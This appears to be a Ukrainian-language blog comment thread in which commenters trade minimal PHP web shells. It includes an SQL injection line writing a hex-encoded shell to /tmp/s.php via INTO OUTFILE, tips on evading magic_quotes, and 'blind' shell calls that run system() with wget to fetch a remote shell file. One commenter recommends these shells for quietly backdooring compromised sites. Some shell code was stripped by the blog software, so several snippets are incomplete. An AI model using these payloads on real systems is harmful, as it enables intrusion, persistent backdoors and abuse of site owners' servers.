ну якшо бути чесним, то не я його придумав

Я так і здогадувався, що цей шел придумали до тебе і ти повідомив про вже існуючий шел. Просто треба було в тексті його якось назвати .

незнаю чого ти не опублікував hex цого шеллу, який пригодиться при magic_quotes On:
>> select 0?3c3f3d40602463603f3e into outfile ‘/tmp/s.php’;

Ну, кому треба зробити hex-версію шела, той зробить це самотужки, не варто лінитися . До того ж, окрім використання хекса, при SQL Injection атаках для обходу magic_quotes можна використовувати мій SQL Injection ASCII Encoder.

А от стосовно приклада з into outfile, то він дуже невдалий. Ти завжди добре подумай перед тим як привести приклад і завжди перечитуй текст перед його публікаціює - це дозволить уникнути таких ляпів. Бо приклад неробочий (знов тебе понесло на “неробочі дірки”, як з тою діркою в плагіні до WP).

Для запису в файл через into outfile потрібні лапки, тому з включеними magic_quotes цього зробити не вдасться. Тому й не вдасться записати шел у файл через SQL Injection і тому даний приклад шела в хексі є неактуальним, бо обійшовши таким чином mq для текста шела, їх не вдасться обійти в імені файла (і по цій причині SQL запит не виконається). Зовсім не подумавши ти це приклад написав .

завжди є альтернатива, тому аналог від Електа - “сліпий” шелл:
…
а ше один аналог в 9байт від того самого Електа :

Ти ці два шела перезапость в коментарі з врахуванням моїх рекомендацій по використанню html-entities кутових дужок.

водрпрес знову обрізав теги, і це шо потрібно, тому ше раз:

WordPress не знову їх обрізав, а він завжди обрізає теги . Є лише базовий набір тегів, які WP дозволяє в коментах.

“сліпий” шелл від Електа:

poma, в твоєму випадку потрібно вводити кутові дужки через їх html-entities:

> - >
&lt; - <

І тоді зможеш ввести потрібний php код.

“сліпий” шелл від Електа:
>> >

“сліпий” шелл від Електа:
>> >

незнаю чого ти не опублікував hex цого шеллу, який пригодиться при magic_quotes On:
>> select 0×3c3f3d40602463603f3e into outfile ‘/tmp/s.php’;

і такий шелл, я так думаю, для залиття не варто використовувати, бо можна зайвий раз “спалитися”

такий шелл потрібно використовувати при протроянювання сайтів, коли хочете залишити “незамітний” слід..

і ше до цого всього:
завжди є альтернатива, тому аналог від Електа - “сліпий” шелл:
>> > ?a=system(’wget http://site.com/shell.txt’);

а ше один аналог в 9байт від того самого Електа :
>> > ?a=system&b=wget%20http://site.com//shell.txt